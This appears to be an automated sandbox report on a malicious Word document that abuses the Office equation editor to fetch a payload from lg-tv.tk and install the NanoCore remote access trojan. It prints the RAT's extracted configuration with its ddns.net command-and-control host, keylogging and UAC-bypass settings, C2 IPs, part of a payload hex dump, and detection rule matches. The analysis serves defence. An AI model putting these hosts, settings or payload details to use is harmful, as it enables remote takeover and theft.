Author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard: Data: Command: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\plugmangd5693.exe, ParentImage: C:\Users\user\AppData\Roaming\plugmangd5693.exe, ParentProcessId: 1580, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, ProcessId: 1292

Sigma detected: Possible Applocker Bypass

Show sources

Source: Process started

Author: juju4: Data: Command: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\plugmangd5693.exe, ParentImage: C:\Users\user\AppData\Roaming\plugmangd5693.exe, ParentProcessId: 1580, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, ProcessId: 1292

Stealing of Sensitive Information:

Sigma detected: NanoCore

Show sources

Source: File created

Remote Access Functionality:

Sigma detected: NanoCore

Show sources

Source: File created

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000008.00000002.673059693.0000000003826000.00000004.00000001.sdmp

Malware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "6f656d69-7475-8807-1300-000c0a4c", "Group": "Default", "Domain1": "blackbladeinc52.ddns.net", "Domain2": "Backup Connection Host", "Port": 1664, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n <RegistrationInfo />\r\n <Triggers />\r\n <Principals>\r\n <Principal id=\"Author\">\r\n <LogonType>InteractiveToken</LogonType>\r\n <RunLevel>HighestAvailable</RunLevel>\r\n </Principal>\r\n </Principals>\r\n <Settings>\r\n <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n <AllowHardTerminate>true</AllowHardTerminate>\r\n <StartWhenAvailable>false</StartWhenAvailable>\r\n <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n <IdleSettings>\r\n <StopOnIdleEnd>false</StopOnIdleEnd>\r\n <RestartOnIdle>false</RestartOnIdle>\r\n </IdleSettings>\r\n <AllowStartOnDemand>true</AllowStartOnDemand>\r\n <Enabled>true</Enabled>\r\n <Hidden>false</Hidden>\r\n <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n <WakeToRun>false</WakeToRun>\r\n <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n <Priority>4</Priority>\r\n </Settings>\r\n <Actions Context=\"Author\">\r\n <Exec>\r\n <Command>\"#EXECUTABLEPATH\"</Command>\r\n <Arguments>$(Arg0)</Arguments>\r\n </Exec>\r\n </Actions>\r\n</Task"}

Multi AV Scanner detection for submitted file

Show sources

Source: PO-14092021.doc	Virustotal: Detection: 27%			Perma Link
Source: PO-14092021.doc	ReversingLabs: Detection: 20%

Antivirus detection for URL or domain

Show sources

Source: http://lg-tv.tk/plugmanzx.exe

Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Show sources

Source: lg-tv.tk	Virustotal: Detection: 14%			Perma Link
Source: blackbladeinc52.ddns.net	Virustotal: Detection: 10%			Perma Link

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\plugmanzx[1].exe	ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Roaming\RWbqWnnjDWI.exe	ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	ReversingLabs: Detection: 39%

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 8.2.RegSvcs.exe.764629.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.RegSvcs.exe.384dabc.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.RegSvcs.exe.760000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.RegSvcs.exe.3848c86.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.RegSvcs.exe.384dabc.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.RegSvcs.exe.38520e5.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.plugmangd5693.exe.a1f94b8.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.RegSvcs.exe.760000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.plugmangd5693.exe.a1f94b8.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.671662373.0000000000760000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.440005121.000000000A26C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.439861078.000000000A161000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.671408794.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.673059693.0000000003826000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: plugmangd5693.exe PID: 1580, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 2996, type: MEMORYSTR

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\RWbqWnnjDWI.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\plugmangd5693.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\plugmanzx[1].exe	Joe Sandbox ML: detected

Source: 8.2.RegSvcs.exe.400000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 8.2.RegSvcs.exe.760000.2.unpack	Avira: Label: TR/NanoCore.fadte

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\plugmangd5693.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\plugmangd5693.exe			Jump to behavior

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: System.pdbSystem.pdbpdbtem.pdbm\2.0.0.0__b77a5c561934e089\System.pdb9FFP source: RegSvcs.exe, 00000008.00000002.673552663.00000000057FC000.00000004.00000001.sdmp
Source:	Binary string: C:\Windows\dll\System.pdbog source: RegSvcs.exe, 00000008.00000002.671936155.0000000000E56000.00000004.00000040.sdmp
Source:	Binary string: System.pdb H source: RegSvcs.exe, 00000008.00000002.673552663.00000000057FC000.00000004.00000001.sdmp
Source:	Binary string: qC:\Windows\System.pdb4 source: RegSvcs.exe, 00000008.00000002.673552663.00000000057FC000.00000004.00000001.sdmp
Source:	Binary string: s.pdb source: RegSvcs.exe, 00000008.00000002.671847791.0000000000C7D000.00000004.00000001.sdmp
Source:	Binary string: RegSvcs.pdb source: smtpsvc.exe
Source:	Binary string: #=qo5Pv9nXCIU9X_B8SJDUR_qgp7npNK2pA1rGP0GNQ51o=symbols\dll\System.pdb source: RegSvcs.exe, 00000008.00000002.673552663.00000000057FC000.00000004.00000001.sdmp
Source:	Binary string: C:\Win.pdbassembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.dll source: RegSvcs.exe, 00000008.00000002.673552663.00000000057FC000.00000004.00000001.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.pdb source: RegSvcs.exe, 00000008.00000002.671936155.0000000000E56000.00000004.00000040.sdmp
Source:	Binary string: System.pdb source: RegSvcs.exe, 00000008.00000002.673552663.00000000057FC000.00000004.00000001.sdmp
Source:	Binary string: System.pdb8 source: RegSvcs.exe, 00000008.00000002.671936155.0000000000E56000.00000004.00000040.sdmp
Source:	Binary string: ystem.pdbl2}/ source: RegSvcs.exe, 00000008.00000002.671936155.0000000000E56000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdb source: RegSvcs.exe, 00000008.00000002.671936155.0000000000E56000.00000004.00000040.sdmp
Source:	Binary string: indows\System.pdbpdbtem.pdbes source: RegSvcs.exe, 00000008.00000002.671936155.0000000000E56000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.pdb source: RegSvcs.exe, 00000008.00000002.671936155.0000000000E56000.00000004.00000040.sdmp

Source: global traffic

DNS query: name: lg-tv.tk

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 185.239.243.112:80

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 185.239.243.112:80

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	URLs: blackbladeinc52.ddns.net
Source: Malware configuration extractor	URLs: Backup Connection Host

Uses dynamic DNS services

Show sources

Source: unknown

DNS query: name: blackbladeinc52.ddns.net

Source: Joe Sandbox View	ASN Name: CLOUDIE-AS-APCloudieLimitedHK CLOUDIE-AS-APCloudieLimitedHK
Source: Joe Sandbox View	ASN Name: PLUSSERVER-ASN1DE PLUSSERVER-ASN1DE

Source: Joe Sandbox View

IP Address: 185.239.243.112 185.239.243.112

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 14 Sep 2021 11:16:21 GMTContent-Type: application/x-msdownloadContent-Length: 530432Last-Modified: Tue, 14 Sep 2021 00:28:19 GMTConnection: keep-aliveETag: "613feca3-81800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 25 ea 3f 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 0e 08 00 00 08 00 00 00 00 00 00 62 2d 08 00 00 20 00 00 00 40 08 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 10 2d 08 00 4f 00 00 00 00 40 08 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 08 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 70 0d 08 00 00 20 00 00 00 0e 08 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 9c 05 00 00 00 40 08 00 00 06 00 00 00 10 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 08 00 00 02 00 00 00 16 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 2d 08 00 00 00 00 00 48 00 00 00 02 00 05 00 a0 64 00 00 a8 e3 01 00 03 00 00 00 32 00 00 06 48 48 02 00 c8 e4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 04 00 50 00 00 00 01 00 00 11 02 28 14 00 00 0a 00 00 02 1f 0a 1f 0a 73 15 00 00 0a 7d 01 00 00 04 16 0a 2b 2b 00 16 0b 2b 18 00 02 7b 01 00 00 04 06 07 73 16 00 00 0a 28 17 00 00 0a 00 07 17 58 0b 07 1f 0a fe 04 0c 08 2d df 00 06 17 58 0a 06 1f 0a fe 04 0d 09 2d cc 2a 13 30 01 00 0c 00 00 00 02 00 00 11 00 02 7b 01 00 00 04 0a 2b 00 06 2a 26 00 02 03 7d 01 00 00 04 2a 00 00 1b 30 04 00 a0 00 00 00 03 00 00 11 00 03 1f 09 30 0f 03 16 32 0b 04 1f 09 30 06 04 16 fe 04 2b 01 17 0a 06 2c 13 00 1f 0f 1f 0f 72 01 00 00 70 1f 0f 28 2e 00 00 06 00 00 02 28 02 00 00 06 03 04 28 18 00 00 0a 6f 19 00 00 0a 16 fe 03 0b 07 2c 15 00 1f 0f 1f 0f 72 3f 00 00 70 1f 0f 28 2e 00 00 06 00 00 2b 44 00 00 05 6f 1a 00 00 0a 0c 2b 1e 12 02 28 1b 00 00 0a 0d 00 02 28 02 00 00 06 03 04 28 18 00 00 0a 09 6f 1c 00 00 0a 00 00 12 02 28 1d 00 00 0a 2d d9 de 0f 12 02 fe 16 03 00 00 1b 6f 1e 00 00 0a 00 dc 00 2a 01 10 00 00 02 00 64 00 2b 8f 00 0f 00 00 00 00 13 30 03 00 22 01

Source: global traffic

HTTP traffic detected: GET /plugmanzx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: lg-tv.tkConnection: Keep-Alive

Source: global traffic

TCP traffic: 192.168.2.22:49166 -> 31.210.20.61:1664

Source: plugmangd5693.exe, 00000004.00000002.427110466.0000000004D50000.00000002.00020000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: plugmangd5693.exe, 00000004.00000002.427110466.0000000004D50000.00000002.00020000.sdmp, RegSvcs.exe, 00000008.00000002.673567560.0000000005800000.00000002.00020000.sdmp, taskeng.exe, 0000000C.00000002.671441665.0000000001AF0000.00000002.00020000.sdmp	String found in binary or memory: http://www.%s.comPA

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{33484DAD-E27E-45D9-8C45-49A85BDC4F7E}.tmp

Jump to behavior

Source: unknown

DNS traffic detected: queries for: lg-tv.tk

Source: global traffic

Source: RegSvcs.exe

Binary or memory string: RegisterRawInputDevices

E-Banking Fraud:

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 8.2.RegSvcs.exe.764629.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.RegSvcs.exe.384dabc.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.RegSvcs.exe.760000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.RegSvcs.exe.3848c86.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.RegSvcs.exe.384dabc.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.RegSvcs.exe.38520e5.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.plugmangd5693.exe.a1f94b8.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.RegSvcs.exe.760000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.plugmangd5693.exe.a1f94b8.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.671662373.0000000000760000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.440005121.000000000A26C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.439861078.000000000A161000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.671408794.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.673059693.0000000003826000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: plugmangd5693.exe PID: 1580, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 2996, type: MEMORYSTR

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 8.2.RegSvcs.exe.764629.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 8.2.RegSvcs.exe.384dabc.7.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 8.2.RegSvcs.exe.760000.2.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 8.2.RegSvcs.exe.3848c86.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 8.2.RegSvcs.exe.3848c86.6.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 8.2.RegSvcs.exe.5a0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 8.2.RegSvcs.exe.384dabc.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 8.2.RegSvcs.exe.38520e5.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.plugmangd5693.exe.a1f94b8.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.plugmangd5693.exe.a1f94b8.10.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 8.2.RegSvcs.exe.760000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.plugmangd5693.exe.a1f94b8.10.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 4.2.plugmangd5693.exe.a1f94b8.10.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 8.2.RegSvcs.exe.2811644.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000008.00000002.671662373.0000000000760000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000008.00000002.671546681.00000000005A0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000004.00000002.440005121.000000000A26C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000004.00000002.440005121.000000000A26C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000004.00000002.439861078.000000000A161000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000004.00000002.439861078.000000000A161000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000008.00000002.671408794.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000008.00000002.671408794.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000008.00000002.673059693.0000000003826000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: plugmangd5693.exe PID: 1580, type: MEMORYSTR	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: plugmangd5693.exe PID: 1580, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: RegSvcs.exe PID: 2996, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>

Office equation editor drops PE file

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\plugmangd5693.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\plugmanzx[1].exe			Jump to dropped file

.NET source code contains very large strings

Show sources

Source: plugmanzx[1].exe.2.dr, ConsoleGame/Form1.cs	Long String: Length: 50988
Source: plugmangd5693.exe.2.dr, ConsoleGame/Form1.cs	Long String: Length: 50988
Source: RWbqWnnjDWI.exe.4.dr, ConsoleGame/Form1.cs	Long String: Length: 50988
Source: 4.2.plugmangd5693.exe.330000.0.unpack, ConsoleGame/Form1.cs	Long String: Length: 50988
Source: 4.0.plugmangd5693.exe.330000.0.unpack, ConsoleGame/Form1.cs	Long String: Length: 50988

Source: 8.2.RegSvcs.exe.764629.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 8.2.RegSvcs.exe.764629.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 8.2.RegSvcs.exe.384dabc.7.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 8.2.RegSvcs.exe.384dabc.7.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 8.2.RegSvcs.exe.760000.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 8.2.RegSvcs.exe.760000.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 8.2.RegSvcs.exe.3848c86.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 8.2.RegSvcs.exe.3848c86.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 8.2.RegSvcs.exe.3848c86.6.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 8.2.RegSvcs.exe.5a0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 8.2.RegSvcs.exe.5a0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
